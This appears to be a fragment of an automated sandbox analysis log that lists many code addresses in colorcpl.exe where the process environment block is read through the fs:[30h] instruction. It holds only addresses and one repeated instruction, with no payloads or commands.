Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045B7016 mov eax, dword ptr fs:[00000030h] 16_2_045B7016
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045B6C0A mov eax, dword ptr fs:[00000030h] 16_2_045B6C0A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045B6C0A mov eax, dword ptr fs:[00000030h] 16_2_045B6C0A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045B6C0A mov eax, dword ptr fs:[00000030h] 16_2_045B6C0A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045B6C0A mov eax, dword ptr fs:[00000030h] 16_2_045B6C0A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h] 16_2_045F1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h] 16_2_045F1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h] 16_2_045F1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h] 16_2_045F1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h] 16_2_045F1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h] 16_2_045F1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h] 16_2_045F1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h] 16_2_045F1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h] 16_2_045F1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h] 16_2_045F1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h] 16_2_045F1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h] 16_2_045F1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h] 16_2_045F1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h] 16_2_045F1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0460740D mov eax, dword ptr fs:[00000030h] 16_2_0460740D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0460740D mov eax, dword ptr fs:[00000030h] 16_2_0460740D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0460740D mov eax, dword ptr fs:[00000030h] 16_2_0460740D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04604015 mov eax, dword ptr fs:[00000030h] 16_2_04604015
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04604015 mov eax, dword ptr fs:[00000030h] 16_2_04604015
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456BC2C mov eax, dword ptr fs:[00000030h] 16_2_0456BC2C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456002D mov eax, dword ptr fs:[00000030h] 16_2_0456002D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456002D mov eax, dword ptr fs:[00000030h] 16_2_0456002D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456002D mov eax, dword ptr fs:[00000030h] 16_2_0456002D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456002D mov eax, dword ptr fs:[00000030h] 16_2_0456002D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456002D mov eax, dword ptr fs:[00000030h] 16_2_0456002D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0454B02A mov eax, dword ptr fs:[00000030h] 16_2_0454B02A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0454B02A mov eax, dword ptr fs:[00000030h] 16_2_0454B02A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0454B02A mov eax, dword ptr fs:[00000030h] 16_2_0454B02A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0454B02A mov eax, dword ptr fs:[00000030h] 16_2_0454B02A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045CB8D0 mov eax, dword ptr fs:[00000030h] 16_2_045CB8D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045CB8D0 mov ecx, dword ptr fs:[00000030h] 16_2_045CB8D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045CB8D0 mov eax, dword ptr fs:[00000030h] 16_2_045CB8D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045CB8D0 mov eax, dword ptr fs:[00000030h] 16_2_045CB8D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045CB8D0 mov eax, dword ptr fs:[00000030h] 16_2_045CB8D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045CB8D0 mov eax, dword ptr fs:[00000030h] 16_2_045CB8D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045F14FB mov eax, dword ptr fs:[00000030h] 16_2_045F14FB
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045B6CF0 mov eax, dword ptr fs:[00000030h] 16_2_045B6CF0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045B6CF0 mov eax, dword ptr fs:[00000030h] 16_2_045B6CF0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045B6CF0 mov eax, dword ptr fs:[00000030h] 16_2_045B6CF0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04608CD6 mov eax, dword ptr fs:[00000030h] 16_2_04608CD6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045358EC mov eax, dword ptr fs:[00000030h] 16_2_045358EC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0454849B mov eax, dword ptr fs:[00000030h] 16_2_0454849B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04539080 mov eax, dword ptr fs:[00000030h] 16_2_04539080
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045B3884 mov eax, dword ptr fs:[00000030h] 16_2_045B3884
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045B3884 mov eax, dword ptr fs:[00000030h] 16_2_045B3884
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456F0BF mov ecx, dword ptr fs:[00000030h] 16_2_0456F0BF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456F0BF mov eax, dword ptr fs:[00000030h] 16_2_0456F0BF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456F0BF mov eax, dword ptr fs:[00000030h] 16_2_0456F0BF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045620A0 mov eax, dword ptr fs:[00000030h] 16_2_045620A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045620A0 mov eax, dword ptr fs:[00000030h] 16_2_045620A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045620A0 mov eax, dword ptr fs:[00000030h] 16_2_045620A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045620A0 mov eax, dword ptr fs:[00000030h] 16_2_045620A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045620A0 mov eax, dword ptr fs:[00000030h] 16_2_045620A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045620A0 mov eax, dword ptr fs:[00000030h] 16_2_045620A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045790AF mov eax, dword ptr fs:[00000030h] 16_2_045790AF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04557D50 mov eax, dword ptr fs:[00000030h] 16_2_04557D50
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0455B944 mov eax, dword ptr fs:[00000030h] 16_2_0455B944
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0455B944 mov eax, dword ptr fs:[00000030h] 16_2_0455B944
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04573D43 mov eax, dword ptr fs:[00000030h] 16_2_04573D43
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045B3540 mov eax, dword ptr fs:[00000030h] 16_2_045B3540
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0453B171 mov eax, dword ptr fs:[00000030h] 16_2_0453B171
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0453B171 mov eax, dword ptr fs:[00000030h] 16_2_0453B171
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0455C577 mov eax, dword ptr fs:[00000030h] 16_2_0455C577
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0455C577 mov eax, dword ptr fs:[00000030h] 16_2_0455C577
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0453C962 mov eax, dword ptr fs:[00000030h] 16_2_0453C962
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04539100 mov eax, dword ptr fs:[00000030h] 16_2_04539100
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04539100 mov eax, dword ptr fs:[00000030h] 16_2_04539100
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04539100 mov eax, dword ptr fs:[00000030h] 16_2_04539100
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04608D34 mov eax, dword ptr fs:[00000030h] 16_2_04608D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h] 16_2_04543D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h] 16_2_04543D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h] 16_2_04543D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h] 16_2_04543D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h] 16_2_04543D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h] 16_2_04543D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h] 16_2_04543D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h] 16_2_04543D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h] 16_2_04543D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h] 16_2_04543D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h] 16_2_04543D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h] 16_2_04543D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h] 16_2_04543D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0453AD30 mov eax, dword ptr fs:[00000030h] 16_2_0453AD30
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456513A mov eax, dword ptr fs:[00000030h] 16_2_0456513A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456513A mov eax, dword ptr fs:[00000030h] 16_2_0456513A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045BA537 mov eax, dword ptr fs:[00000030h] 16_2_045BA537
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04564D3B mov eax, dword ptr fs:[00000030h] 16_2_04564D3B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04564D3B mov eax, dword ptr fs:[00000030h] 16_2_04564D3B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04564D3B mov eax, dword ptr fs:[00000030h] 16_2_04564D3B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04554120 mov eax, dword ptr fs:[00000030h] 16_2_04554120
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04554120 mov eax, dword ptr fs:[00000030h] 16_2_04554120
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04554120 mov eax, dword ptr fs:[00000030h] 16_2_04554120
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04554120 mov eax, dword ptr fs:[00000030h] 16_2_04554120
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04554120 mov ecx, dword ptr fs:[00000030h] 16_2_04554120
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045E8DF1 mov eax, dword ptr fs:[00000030h] 16_2_045E8DF1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0453B1E1 mov eax, dword ptr fs:[00000030h] 16_2_0453B1E1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0453B1E1 mov eax, dword ptr fs:[00000030h] 16_2_0453B1E1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0453B1E1 mov eax, dword ptr fs:[00000030h] 16_2_0453B1E1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045C41E8 mov eax, dword ptr fs:[00000030h] 16_2_045C41E8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0454D5E0 mov eax, dword ptr fs:[00000030h] 16_2_0454D5E0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0454D5E0 mov eax, dword ptr fs:[00000030h] 16_2_0454D5E0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04562990 mov eax, dword ptr fs:[00000030h] 16_2_04562990
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456FD9B mov eax, dword ptr fs:[00000030h] 16_2_0456FD9B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456FD9B mov eax, dword ptr fs:[00000030h] 16_2_0456FD9B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456A185 mov eax, dword ptr fs:[00000030h] 16_2_0456A185
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0455C182 mov eax, dword ptr fs:[00000030h] 16_2_0455C182
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04562581 mov eax, dword ptr fs:[00000030h] 16_2_04562581
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04562581 mov eax, dword ptr fs:[00000030h] 16_2_04562581
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04562581 mov eax, dword ptr fs:[00000030h] 16_2_04562581
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04562581 mov eax, dword ptr fs:[00000030h] 16_2_04562581
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04532D8A mov eax, dword ptr fs:[00000030h] 16_2_04532D8A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04532D8A mov eax, dword ptr fs:[00000030h] 16_2_04532D8A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04532D8A mov eax, dword ptr fs:[00000030h] 16_2_04532D8A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04532D8A mov eax, dword ptr fs:[00000030h] 16_2_04532D8A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04532D8A mov eax, dword ptr fs:[00000030h] 16_2_04532D8A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04561DB5 mov eax, dword ptr fs:[00000030h] 16_2_04561DB5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04561DB5 mov eax, dword ptr fs:[00000030h] 16_2_04561DB5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04561DB5 mov eax, dword ptr fs:[00000030h] 16_2_04561DB5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045B51BE mov eax, dword ptr fs:[00000030h] 16_2_045B51BE
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045B51BE mov eax, dword ptr fs:[00000030h] 16_2_045B51BE
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045B51BE mov eax, dword ptr fs:[00000030h] 16_2_045B51BE
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045B51BE mov eax, dword ptr fs:[00000030h] 16_2_045B51BE
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045661A0 mov eax, dword ptr fs:[00000030h] 16_2_045661A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045661A0 mov eax, dword ptr fs:[00000030h] 16_2_045661A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045635A1 mov eax, dword ptr fs:[00000030h] 16_2_045635A1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045B69A6 mov eax, dword ptr fs:[00000030h] 16_2_045B69A6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04608A62 mov eax, dword ptr fs:[00000030h] 16_2_04608A62
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045C4257 mov eax, dword ptr fs:[00000030h] 16_2_045C4257
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04539240 mov eax, dword ptr fs:[00000030h] 16_2_04539240
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04539240 mov eax, dword ptr fs:[00000030h] 16_2_04539240
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04539240 mov eax, dword ptr fs:[00000030h] 16_2_04539240
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04539240 mov eax, dword ptr fs:[00000030h] 16_2_04539240
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04547E41 mov eax, dword ptr fs:[00000030h] 16_2_04547E41
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04547E41 mov eax, dword ptr fs:[00000030h] 16_2_04547E41
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04547E41 mov eax, dword ptr fs:[00000030h] 16_2_04547E41
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04547E41 mov eax, dword ptr fs:[00000030h] 16_2_04547E41
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04547E41 mov eax, dword ptr fs:[00000030h] 16_2_04547E41
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04547E41 mov eax, dword ptr fs:[00000030h] 16_2_04547E41
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0455AE73 mov eax, dword ptr fs:[00000030h] 16_2_0455AE73
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0455AE73 mov eax, dword ptr fs:[00000030h] 16_2_0455AE73
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0455AE73 mov eax, dword ptr fs:[00000030h] 16_2_0455AE73
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0455AE73 mov eax, dword ptr fs:[00000030h] 16_2_0455AE73
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0455AE73 mov eax, dword ptr fs:[00000030h] 16_2_0455AE73
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0457927A mov eax, dword ptr fs:[00000030h] 16_2_0457927A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0454766D mov eax, dword ptr fs:[00000030h] 16_2_0454766D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045EB260 mov eax, dword ptr fs:[00000030h] 16_2_045EB260
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045EB260 mov eax, dword ptr fs:[00000030h] 16_2_045EB260
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0453AA16 mov eax, dword ptr fs:[00000030h] 16_2_0453AA16
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0453AA16 mov eax, dword ptr fs:[00000030h] 16_2_0453AA16
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04553A1C mov eax, dword ptr fs:[00000030h] 16_2_04553A1C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456A61C mov eax, dword ptr fs:[00000030h] 16_2_0456A61C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456A61C mov eax, dword ptr fs:[00000030h] 16_2_0456A61C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0453C600 mov eax, dword ptr fs:[00000030h] 16_2_0453C600
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0453C600 mov eax, dword ptr fs:[00000030h] 16_2_0453C600
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0453C600 mov eax, dword ptr fs:[00000030h] 16_2_0453C600
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04568E00 mov eax, dword ptr fs:[00000030h] 16_2_04568E00
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04548A0A mov eax, dword ptr fs:[00000030h] 16_2_04548A0A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045EFE3F mov eax, dword ptr fs:[00000030h] 16_2_045EFE3F
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0453E620 mov eax, dword ptr fs:[00000030h] 16_2_0453E620
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04574A2C mov eax, dword ptr fs:[00000030h] 16_2_04574A2C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04574A2C mov eax, dword ptr fs:[00000030h] 16_2_04574A2C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04578EC7 mov eax, dword ptr fs:[00000030h] 16_2_04578EC7
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045636CC mov eax, dword ptr fs:[00000030h] 16_2_045636CC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04562ACB mov eax, dword ptr fs:[00000030h] 16_2_04562ACB
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045EFEC0 mov eax, dword ptr fs:[00000030h] 16_2_045EFEC0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04562AE4 mov eax, dword ptr fs:[00000030h] 16_2_04562AE4
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045616E0 mov ecx, dword ptr fs:[00000030h] 16_2_045616E0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04608ED6 mov eax, dword ptr fs:[00000030h] 16_2_04608ED6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045476E2 mov eax, dword ptr fs:[00000030h] 16_2_045476E2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456D294 mov eax, dword ptr fs:[00000030h] 16_2_0456D294
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456D294 mov eax, dword ptr fs:[00000030h] 16_2_0456D294
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04600EA5 mov eax, dword ptr fs:[00000030h] 16_2_04600EA5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04600EA5 mov eax, dword ptr fs:[00000030h] 16_2_04600EA5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04600EA5 mov eax, dword ptr fs:[00000030h] 16_2_04600EA5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045CFE87 mov eax, dword ptr fs:[00000030h] 16_2_045CFE87
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0454AAB0 mov eax, dword ptr fs:[00000030h] 16_2_0454AAB0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0454AAB0 mov eax, dword ptr fs:[00000030h] 16_2_0454AAB0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456FAB0 mov eax, dword ptr fs:[00000030h] 16_2_0456FAB0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045352A5 mov eax, dword ptr fs:[00000030h] 16_2_045352A5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045352A5 mov eax, dword ptr fs:[00000030h] 16_2_045352A5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045352A5 mov eax, dword ptr fs:[00000030h] 16_2_045352A5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045352A5 mov eax, dword ptr fs:[00000030h] 16_2_045352A5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045352A5 mov eax, dword ptr fs:[00000030h] 16_2_045352A5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045B46A7 mov eax, dword ptr fs:[00000030h] 16_2_045B46A7
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04608F6A mov eax, dword ptr fs:[00000030h] 16_2_04608F6A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0453F358 mov eax, dword ptr fs:[00000030h] 16_2_0453F358
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0453DB40 mov eax, dword ptr fs:[00000030h] 16_2_0453DB40
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0454EF40 mov eax, dword ptr fs:[00000030h] 16_2_0454EF40
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04563B7A mov eax, dword ptr fs:[00000030h] 16_2_04563B7A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04563B7A mov eax, dword ptr fs:[00000030h] 16_2_04563B7A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0453DB60 mov ecx, dword ptr fs:[00000030h] 16_2_0453DB60
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0454FF60 mov eax, dword ptr fs:[00000030h] 16_2_0454FF60
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04608B58 mov eax, dword ptr fs:[00000030h] 16_2_04608B58
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0455F716 mov eax, dword ptr fs:[00000030h] 16_2_0455F716
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045F131B mov eax, dword ptr fs:[00000030h] 16_2_045F131B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045CFF10 mov eax, dword ptr fs:[00000030h] 16_2_045CFF10
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045CFF10 mov eax, dword ptr fs:[00000030h] 16_2_045CFF10
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456A70E mov eax, dword ptr fs:[00000030h] 16_2_0456A70E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456A70E mov eax, dword ptr fs:[00000030h] 16_2_0456A70E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456E730 mov eax, dword ptr fs:[00000030h] 16_2_0456E730
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0460070D mov eax, dword ptr fs:[00000030h] 16_2_0460070D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0460070D mov eax, dword ptr fs:[00000030h] 16_2_0460070D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04534F2E mov eax, dword ptr fs:[00000030h] 16_2_04534F2E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04534F2E mov eax, dword ptr fs:[00000030h] 16_2_04534F2E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045B53CA mov eax, dword ptr fs:[00000030h] 16_2_045B53CA
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045B53CA mov eax, dword ptr fs:[00000030h] 16_2_045B53CA
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045737F5 mov eax, dword ptr fs:[00000030h] 16_2_045737F5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045603E2 mov eax, dword ptr fs:[00000030h] 16_2_045603E2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045603E2 mov eax, dword ptr fs:[00000030h] 16_2_045603E2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045603E2 mov eax, dword ptr fs:[00000030h] 16_2_045603E2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045603E2 mov eax, dword ptr fs:[00000030h] 16_2_045603E2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045603E2 mov eax, dword ptr fs:[00000030h] 16_2_045603E2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045603E2 mov eax, dword ptr fs:[00000030h] 16_2_045603E2
